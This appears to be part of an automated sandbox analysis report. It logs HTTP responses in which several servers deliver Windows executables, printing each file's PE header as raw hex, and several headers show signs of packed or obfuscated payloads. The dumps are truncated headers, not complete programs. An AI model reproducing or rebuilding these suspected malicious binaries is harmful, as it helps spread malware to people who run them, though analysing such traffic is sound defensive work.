                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:00 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:05 GMTContent-Type: application/x-msdos-programContent-Length: 320000Connection: closeLast-Modified: Fri, 14 Jan 2022 12:59:01 GMTETag: "4e200-5d58a5df2ed13"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 fa 3d cc e1 9b 53 9f e1 9b 53 9f e1 9b 53 9f ff c9 c6 9f fb 9b 53 9f ff c9 d0 9f 67 9b 53 9f c6 5d 28 9f e2 9b 53 9f e1 9b 52 9f 00 9b 53 9f ff c9 d7 9f db 9b 53 9f ff c9 c7 9f e0 9b 53 9f ff c9 c2 9f e0 9b 53 9f 52 69 63 68 e1 9b 53 9f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 6d 88 68 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 e8 03 00 00 a8 11 00 00 00 00 00 90 b6 01 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 15 00 00 04 00 00 75 5f 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 e3 03 00 28 00 00 00 00 00 15 00 d0 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 15 00 00 1e 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 e7 03 00 00 10 00 00 00 e8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 00 04 00 00 18 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 61 64 00 00 00 00 05 00 00 00 00 d0 14 00 00 02 00 00 00 04 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 75 78 00 00 00 00 ea 00 00 00 00 e0 14 00 00 02 00 00 00 06 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 63 69 76 75 6a 6f 00 93 0d 00 00 00 f0 14 00 00 0e 00 00 00 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 83 00 00 00 00 15 00 00 84 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 46 00 00 00 90 15 00 00 48 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:08 GMTContent-Type: application/x-msdos-programContent-Length: 322560Connection: closeLast-Modified: Fri, 14 Jan 2022 12:59:02 GMTETag: "4ec00-5d58a5df48353"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 fa 3d cc e1 9b 53 9f e1 9b 53 9f e1 9b 53 9f ff c9 c6 9f fb 9b 53 9f ff c9 d0 9f 67 9b 53 9f c6 5d 28 9f e2 9b 53 9f e1 9b 52 9f 00 9b 53 9f ff c9 d7 9f db 9b 53 9f ff c9 c7 9f e0 9b 53 9f ff c9 c2 9f e0 9b 53 9f 52 69 63 68 e1 9b 53 9f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 d0 e4 8f 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f2 03 00 00 a8 11 00 00 00 00 00 00 c0 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 78 b2 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 ed 03 00 28 00 00 00 00 10 15 00 d0 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f0 1d 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 f0 03 00 00 10 00 00 00 f2 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 75 66 6f 77 00 00 05 00 00 00 00 e0 14 00 00 02 00 00 00 0e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 75 68 00 00 00 00 ea 00 00 00 00 f0 14 00 00 02 00 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 79 69 6c 75 62 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 83 00 00 00 10 15 00 00 84 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 66 46 00 00 00 a0 15 00 00 48 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:45 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 12:59:49 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:59:50 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 11:52:33 GMTETag: "57200-5d589703dfedc"Accept-Ranges: bytesContent-Length: 356864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5c 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 e4 15 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e4 15 04 00 00 90 01 00 00 16 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 12:59:56 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 10:54:23 GMTETag: "246ec0-5d588a02be749"Accept-Ranges: bytesContent-Length: 2387648Content-Type: application/x-msdownloadData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 5e 3d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 64 3f 00 00 18 03 00 00 00 00 00 00 e0 42 00 00 20 00 00 00 a0 3f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 44 00 00 04 00 00 6f 94 24 00 02 00 60 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 3f 00 dc 01 00 00 00 c0 3f 00 14 17 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 65 64 61 74 61 00 00 00 a0 3f 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 b0 3f 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 17 03 00 00 c0 3f 00 14 17 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 43 52 54 00 00 00 00 00 80 01 00 00 e0 42 00 17 79 01 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 13:00:02 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae 